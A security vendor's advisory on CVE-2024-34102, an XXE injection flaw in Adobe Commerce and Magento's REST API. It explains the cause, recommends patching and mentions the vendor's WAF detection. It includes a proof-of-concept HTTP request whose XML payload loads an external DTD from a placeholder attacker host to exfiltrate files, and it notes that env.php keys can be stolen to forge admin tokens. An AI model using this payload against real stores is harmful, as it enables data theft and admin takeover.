Vulnerability report written by the TA team by analyzing "Adobe Commerce & Magento XML External Entity(XXE) Injection"
Adobe Commerce & Magento XML External Entity(XXE) Injection
The vulnerability is an XML External Entities (XXE) Injection vulnerability from Adobe Commerce's Magento, which allows you to insert malicious XML data into a vulnerable class through REST API to access internal files or execute arbitrary commands.
The vulnerabilities can be addressed by applying security patches released in June 2024 by Adobe, which are normally detected in our AIWAF products through patterns that detect XML External Entities (XXE) Injection attacks.
1. Overview
Adobe Commerce, the Adobe-backed eCommerce platform, leverages the open source Magento to provide an eCommerce solution, and there are currently around 120,000 sites using it, or 1.12% of the top 100,000 websites.
Source: https://trends.builtwith.com/shop/Magento
Among the many vulnerabilities found in the service, we've analyzed the recently announced XML external object injection vulnerability, CVE-2024-34102.
Source: https://thehackernews.com/2022/02/critical-magento-0-day-vulnerability.html
2. Attack Process
In June 2024, Adobe released patches for some security issues in Adobe Commerce and Magento, and later released an isolated patch for CVE-2024-34102 in that patch.
Magento is an HTTP PHP server application that provides both a user interface and an API. The API is also available in REST form, and Magento interprets those REST API requests as follows.
Request an example :
POST /rest/default/V1/carts/mine/estimate-shipping-methods HTTP/1.1
Host: foo.example
Content-Type : application/json
Content-Length: 1402
{
"address": {
"data": [1, 2, 3],
"BaseShippingAmount" : 123
}
}
- If a field in the JSON matches a variable name in the Class constructor, pass that field as an Argument.
- When the names don't match, navigate to the field or method in the class named set.
Looking at the field data in the request above, the constructor of the Address class has a data variable in the form of an array, so we pass that data to it.
Then, after the class is instantiated, several methods are called that access the stored data variable.
However, because these operations are recursive over all parameters, it is possible to instantiate a serializable class that the developer did not intend.
According to Assetnote, which analyzed the vulnerability, a deserialization RCE attack is possible through the SimpleXMLElement class in Magento, and further research confirmed that the SimpleXMLElement class can be accessed and instantiated by sending malicious XML data to the sourceData parameter of /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods.
PoC :
POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274
{
"address": {
"totalsReader": {
"collectorList": {
"totalCollector": {
"sourceData": {
"data": "<?xml version=\"1.0\" ?> <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
"options": 16
}
}
}
}
}
}
The vulnerability allows for the following attacks
- You can access the /app/etc/env.php file, which stores the key values used to generate JWT tokens for authentication, and hijack the key values to generate arbitrary admin JWT tokens.
- An RCE attack can be performed in conjunction with the CVE-2024-2961 vulnerability.
- You can access arbitrary local files or get the contents of remote URLs.
3. What to do
Adobe has released a security patch for this vulnerability, so you can apply the patch to mitigate it.
Our AIWAF product is detecting the "409: XML External Entity" pattern, a pattern that detects XML External Entity (XXE) Injection attacks, as normal.
4. Conclusion
The vulnerability found in Magento by Adobe Commerce, a widely used e-commerce platform, is one that can cause a lot of damage with a simple attack syntax, and the recently released security patch should be applied.
Our AIWAF products have developed patterns to respond to vulnerabilities in Magento by Adobe Commerce and will continue to respond quickly to related vulnerabilities as they are discovered.